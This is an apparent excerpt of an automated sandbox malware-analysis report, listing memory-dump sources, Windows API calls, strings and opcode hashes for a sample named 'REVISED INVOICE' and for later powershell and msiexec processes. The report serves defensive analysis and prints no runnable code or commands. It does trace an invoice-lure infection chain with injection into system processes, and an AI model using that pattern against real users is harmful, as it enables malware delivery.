                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$GlobalLibrary
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1100898210-4017390910
                                                                                                • Opcode ID: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
                                                                                                • Instruction ID: 66f8bddb8dfdb1964ca55d912e2b06e4102c5475863404a2afc710826c1672a2
                                                                                                • Opcode Fuzzy Hash: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
                                                                                                • Instruction Fuzzy Hash: CAE0C2B39051206BC7311F04EC08B1AB7BC7F88B32F05416AE8407B3B087742C528BC9
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A25
                                                                                                • CharPrevW.USER32(80000000,00000000), ref: 00405A35
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-66916594
                                                                                                • Opcode ID: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
                                                                                                • Instruction ID: 5bbf66532c1e6c52d9ac91e78c5b81189c295a76ad9a8eb5813a93f974e07d29
                                                                                                • Opcode Fuzzy Hash: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
                                                                                                • Instruction Fuzzy Hash: 95D05EB29109209AD322A708DC419AF73ACEF113407464466F401A31A5D3785D818AAA
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B81
                                                                                                • CharNextA.USER32(00000000), ref: 00405B92
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                                                • Instruction ID: 1b7cebc677eab2b4d2404c83280ad7709bae0e65096c4b9ca61da70a623928b5
                                                                                                • Opcode Fuzzy Hash: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                                                • Instruction Fuzzy Hash: B9F06231504558AFC7029BA5DD40D9FBBB8EF06250B2540A9E800F7351D674FE019BA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 125446119344294da046c6ffcaeb5ae0746660e21bc82e0974237f4ca20d8211
                                                                                                • Instruction ID: 2bd10f4a8077881412eac0b3becbf2ee10ab3f145e7dd33653b79be0b7220213
                                                                                                • Opcode Fuzzy Hash: 125446119344294da046c6ffcaeb5ae0746660e21bc82e0974237f4ca20d8211
                                                                                                • Instruction Fuzzy Hash: E8023D74A102199FDB15CF98C884A9EBBF2FF88314F24855AF805AB365C771ED91CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4cb0a42eed39c6a589132eee9aa2c97ebf3c9239204e0238599e8b828440eec
                                                                                                • Instruction ID: 6a99eeca8cb23cb4c7733d499fa9ea7824e9dc79c7a8f2e114213538780e5921
                                                                                                • Opcode Fuzzy Hash: b4cb0a42eed39c6a589132eee9aa2c97ebf3c9239204e0238599e8b828440eec
                                                                                                • Instruction Fuzzy Hash: C2F13D74A10209AFDB05CF98D480ADDBBB2FF89314F64856AF805AB355C771ED92CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 138fae9efdb4c27525919c3e823cbde9703635344b3666e3b17ae5f7ac95173d
                                                                                                • Instruction ID: 80c39c83bc503d27fc0e19c915a38a4c5b08709c5a96e41d8e8e721fa770fbf0
                                                                                                • Opcode Fuzzy Hash: 138fae9efdb4c27525919c3e823cbde9703635344b3666e3b17ae5f7ac95173d
                                                                                                • Instruction Fuzzy Hash: 9DE14C70A10209AFCB05CF98D484A9DFBF2FF88320F65855AE804AB365C771ED91CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ffc3c7f2ca1e42594a78f2f9370a2e7b36702b34426eb55eae99eb360d7d84e8
                                                                                                • Instruction ID: 3a7ecaacc6b548c6bb115a3f4d84bd432f040374ba2909d7c78cd02eb9bb624c
                                                                                                • Opcode Fuzzy Hash: ffc3c7f2ca1e42594a78f2f9370a2e7b36702b34426eb55eae99eb360d7d84e8
                                                                                                • Instruction Fuzzy Hash: 37819070A093858FCB06CF68C8906D9BFB1FF46310B19819BE540EB3A2D3359C52CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0e3e2bee67a4b4fd1ec93df6e3bddf17ab546ca36d5b814f031d227fe8657ae0
                                                                                                • Instruction ID: 204d0e9edbe2bd6ac44c5fc4edb53bb5a84072d5e7fb99638d7932b359124abc
                                                                                                • Opcode Fuzzy Hash: 0e3e2bee67a4b4fd1ec93df6e3bddf17ab546ca36d5b814f031d227fe8657ae0
                                                                                                • Instruction Fuzzy Hash: F141FC74A106059FCB15CF9CC884AAEBBF2FF88310F648259E915A73A5D735EC91CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 64886b6ed16027c7eb70deff9c69a5f78d56fe22a0eb9606557494dc77859b32
                                                                                                • Instruction ID: b482791aa11dee717fb27cf03c06976ba59e042e67c3a7d81592a9bca8218b73
                                                                                                • Opcode Fuzzy Hash: 64886b6ed16027c7eb70deff9c69a5f78d56fe22a0eb9606557494dc77859b32
                                                                                                • Instruction Fuzzy Hash: 3F310675A006069FCB14CF88C980AAEFBF2FF88310B658299E919A7755C771ED51CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dcf704ae95e0ac2d32d6a3888de0a503e0cda237c089da0708d43b30d31faede
                                                                                                • Instruction ID: 34d155adeff5050d2880a69233303f62004cc4bdae4d17abf68eb0cdc4da8df1
                                                                                                • Opcode Fuzzy Hash: dcf704ae95e0ac2d32d6a3888de0a503e0cda237c089da0708d43b30d31faede
                                                                                                • Instruction Fuzzy Hash: 3121E5B1514201EFDF15CF14D9C0B26BF65EB88324F24C9A9E9094A256C336D866CBB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                                                • Instruction ID: c9ef5931f714672d672901042d36b1b64a580895f748bc72f4ce5246680dee91
                                                                                                • Opcode Fuzzy Hash: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                                                • Instruction Fuzzy Hash: 1F219075504241DFDF06CF14D9C4B16BF72FB48314F24C9A9D9094A256C336D86ACFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 63dc5d6e0b041ab3cb963494a3613bdcf946cfdadfdc0b4eaa390c0973f89609
                                                                                                • Instruction ID: e0aef2f5c3518eadfc1ac1aaf75d2352d062452c2a83c6469efc5dcf44ae436d
                                                                                                • Opcode Fuzzy Hash: 63dc5d6e0b041ab3cb963494a3613bdcf946cfdadfdc0b4eaa390c0973f89609
                                                                                                • Instruction Fuzzy Hash: 8A01296140E3C09FD7128B258894B62BFB4EF53324F1DC0DBD8888F2A7C2699849C772
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6494e315e6653e383eb866c7aafcc7171caaacb0d36effaaac4f19a0fefc505c
                                                                                                • Instruction ID: 6f554d8b8a31a8dd3819ff48065e8fd303a695c280c00ecd8d493654f5762da1
                                                                                                • Opcode Fuzzy Hash: 6494e315e6653e383eb866c7aafcc7171caaacb0d36effaaac4f19a0fefc505c
                                                                                                • Instruction Fuzzy Hash: 2501A271518341AAE7204E29C8C4B66BFE8EF41724F28D45AEC4D4B286C6B9D855CAB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 300e0995a96e8db1896664ec84698d9591637c5d9571e583985b9ed6c5677066
                                                                                                • Instruction ID: fb717847100dc13c61a19e75d3f85c7899fe6958a23cdc5f1d53026132a5b07b
                                                                                                • Opcode Fuzzy Hash: 300e0995a96e8db1896664ec84698d9591637c5d9571e583985b9ed6c5677066
                                                                                                • Instruction Fuzzy Hash: 9EF0BB31A00105DFCB14CF98DC459AEF771FFC8320B648659D955A7654CF35AC52CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e790f450d8e8442c366652ca908e1e5b215d25be8af20af5660e3f7e6363138
                                                                                                • Instruction ID: 103da781b15f56d99dfdcde64ffe42cb78b63ebce54df0857af012999ccad550
                                                                                                • Opcode Fuzzy Hash: 3e790f450d8e8442c366652ca908e1e5b215d25be8af20af5660e3f7e6363138
                                                                                                • Instruction Fuzzy Hash: 29F0FF31A00115AFCB059B88D9409ADFBB6FF88320B644119E914A3264CB72AD22CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 64f198567e31764653a4f26abe4d833d7ad0dc5915d26fb4e0a2169dbb5cac71
                                                                                                • Instruction ID: a64009bea87a3d7df38dcb66e596f0c625fad15362fb983e8c55a4d52eff88e6
                                                                                                • Opcode Fuzzy Hash: 64f198567e31764653a4f26abe4d833d7ad0dc5915d26fb4e0a2169dbb5cac71
                                                                                                • Instruction Fuzzy Hash: 7FE09AB0D01108EFE780DF6884804ADFFF0EB48214B68C5BEC809D3222E7358A17CB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                • Instruction ID: 91f4895e476e863509be7bad44311633acab322c40535bf0b3988318c2bcf4d7
                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                • Instruction Fuzzy Hash: C6D067B0D142199F8780EFADC94156EFBF4EB48200F6485AA8919E7301E7729A529BD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PHp$PHp$[!T<
                                                                                                • API String ID: 0-4268876136
                                                                                                • Opcode ID: 588f2fcaee543c7b4de7be41182b3c98c287cdf6085c5683133a6783371b629d
                                                                                                • Instruction ID: ddedce951b200b2dc747ddbf75e4c166259a466241534ce6610d4d7b92acc9c4
                                                                                                • Opcode Fuzzy Hash: 588f2fcaee543c7b4de7be41182b3c98c287cdf6085c5683133a6783371b629d
                                                                                                • Instruction Fuzzy Hash: 7581D674E00258CFDB58DFA9D884A9DBBF2BF99300F54C069E419AB365DB349A45CF20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PHp$PHp
                                                                                                • API String ID: 0-4032155144
                                                                                                • Opcode ID: 229b8bf1e596606ffb767bd0fdf7ad1898d71fb03f65de67331d413d23d5df4d
                                                                                                • Instruction ID: 0088c7be92bf98991833328253d9b5d30681dc2e9b896457b2a98621ce5581a4
                                                                                                • Opcode Fuzzy Hash: 229b8bf1e596606ffb767bd0fdf7ad1898d71fb03f65de67331d413d23d5df4d
                                                                                                • Instruction Fuzzy Hash: FB81D874E00258CFDB58DFAAD984A9DBBF2BF89304F14C069E819AB355DB349945CF20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PHp$PHp
                                                                                                • API String ID: 0-4032155144
                                                                                                • Opcode ID: 254d5dd62f5c3aa91844d6187c81c68b114b16d50bda69caaec809148127aa06
                                                                                                • Instruction ID: 8d34d2aece8869675888e9136a7a1e15e8052c613034f7f4f50a821260efea32
                                                                                                • Opcode Fuzzy Hash: 254d5dd62f5c3aa91844d6187c81c68b114b16d50bda69caaec809148127aa06
                                                                                                • Instruction Fuzzy Hash: 8481C874E01218CFDB58DFAAD884A9EBBF2BF89304F14D069E409AB355DB345945CF20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PHp$PHp
                                                                                                • API String ID: 0-4032155144
                                                                                                • Opcode ID: e02f7d71bc133509c7b3de18c8a8125d636d4b84ca326503814089f9f1414378
                                                                                                • Instruction ID: cd71799c3f2e637deb85fa76699e9e3e3d0c097ea4df742d4e0c207391e1522e
                                                                                                • Opcode Fuzzy Hash: e02f7d71bc133509c7b3de18c8a8125d636d4b84ca326503814089f9f1414378
                                                                                                • Instruction Fuzzy Hash: DE81C474E00218CFDB48DFA9D884A9DBBF2BF98300F54C06AE819AB355DB309945CF20
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PHp$PHp
                                                                                                • API String ID: 0-4032155144
                                                                                                • Opcode ID: 4462a6ab5645dd8375dada62b044b746d9b65dc30241576f34de16001affe1cc
                                                                                                • Instruction ID: a87de946ade228527bf50547ace6a8fb92a50db5f38108ad94ad0c4ed700e86f
                                                                                                • Opcode Fuzzy Hash: 4462a6ab5645dd8375dada62b044b746d9b65dc30241576f34de16001affe1cc
                                                                                                • Instruction Fuzzy Hash: 4B81D774E00218CFDB58DFA9D884A9DBBF2BF89304F14C069E819AB365DB349945CF20
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e2f1000ce9424c358def9b3ec04ca3ab63c5e3af50de2df79960f290d1dabf98
                                                                                                • Instruction ID: c7e1136d3b5ac40745ddc18ceaeb6c5bba66b42a855a4497794b8071c12f3e40
                                                                                                • Opcode Fuzzy Hash: e2f1000ce9424c358def9b3ec04ca3ab63c5e3af50de2df79960f290d1dabf98
                                                                                                • Instruction Fuzzy Hash: DED18F74E002188FDB58DFA5C994B9DBBB2FF89301F2085A9D809AB354DB359E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 39e56783a23f7a92c4b726ae46ca4b4b5456b3b9f60e52e619f87970a231b429
                                                                                                • Instruction ID: 9188c4f926d237e2f509f25baf382a556213232711f8ba3b447fef3ff5f3ca02
                                                                                                • Opcode Fuzzy Hash: 39e56783a23f7a92c4b726ae46ca4b4b5456b3b9f60e52e619f87970a231b429
                                                                                                • Instruction Fuzzy Hash: AFD1B274E00218CFDB18DFA5C994B9DBBB2BF89300F2081A9D819AB355DB355E85CF61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73be3999545015ddc98d019fc8d46e0856329cc0dddeae4073b12a8b12559623
                                                                                                • Instruction ID: ea481d6f38f1b5cd0c890bee753763780631715ba5b97a3e22fad13994d59257
                                                                                                • Opcode Fuzzy Hash: 73be3999545015ddc98d019fc8d46e0856329cc0dddeae4073b12a8b12559623
                                                                                                • Instruction Fuzzy Hash: 66D1A274E002188FDB58DFA5C990B9DBBB2BF89300F2085A9D809AB355DB755E82CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c11143eb373d5fe90e7102bcde12428c8819dacaf2021cc0d951982d3655dd97
                                                                                                • Instruction ID: 9f5df0a88bc0d6627830733d0b5a90eff7ecee613f6de6dfbe298561ebb8274c
                                                                                                • Opcode Fuzzy Hash: c11143eb373d5fe90e7102bcde12428c8819dacaf2021cc0d951982d3655dd97
                                                                                                • Instruction Fuzzy Hash: EBC1E7B1D052598FEB64CF69D884BD9BBB2BF8A300F14C0EAD40CAB251D7355A85CF11
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b33d3772f25eea86e3d8493ab3bccaadf4f562c1223f33cc3e7989151f2e0aae
                                                                                                • Instruction ID: 6ddf0356e679f5f51448017ab009e827e8fa2cac7cdc5d6ff26e1c845c98f1c1
                                                                                                • Opcode Fuzzy Hash: b33d3772f25eea86e3d8493ab3bccaadf4f562c1223f33cc3e7989151f2e0aae
                                                                                                • Instruction Fuzzy Hash: A5A103B0D00208DFEB14DFA9C984BDDBBB1BF89304F208669D509AB391DB749A85CF55
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 473260ae0a7550457afeb5eadf81f69a098c0972121dc71c08534376ce8584ec
                                                                                                • Instruction ID: bb61ed955e1e09759707b0ac7d95fa0796e819f8a5391c0fcd8618472d878ce0
                                                                                                • Opcode Fuzzy Hash: 473260ae0a7550457afeb5eadf81f69a098c0972121dc71c08534376ce8584ec
                                                                                                • Instruction Fuzzy Hash: 4FA18475E012198FEB68CF6AD984BDDFBF2AB89300F14C1AAD40CA7254DB345A85CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628813126.0000000021720000.00000040.00000800.00020000.00000000.sdmp, Offset: 21720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21720000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c6a7deabce422f763416c6c2a2eca32e35a1bfbb5f40f1ec65cbc6cb9b2c8da
                                                                                                • Instruction ID: af5634a93e3f78968d42e3442d33009dfe4314ec96ab1351969491847165aabe
                                                                                                • Opcode Fuzzy Hash: 1c6a7deabce422f763416c6c2a2eca32e35a1bfbb5f40f1ec65cbc6cb9b2c8da
                                                                                                • Instruction Fuzzy Hash: DBA19474E016198FEB68CF6AD944B9EFBF2AF89300F14C1AAD40CA7250DB345A85CF11
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628813126.0000000021720000.00000040.00000800.00020000.00000000.sdmp, Offset: 21720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21720000_msiexec.jbxd
                                                                                                Similarity
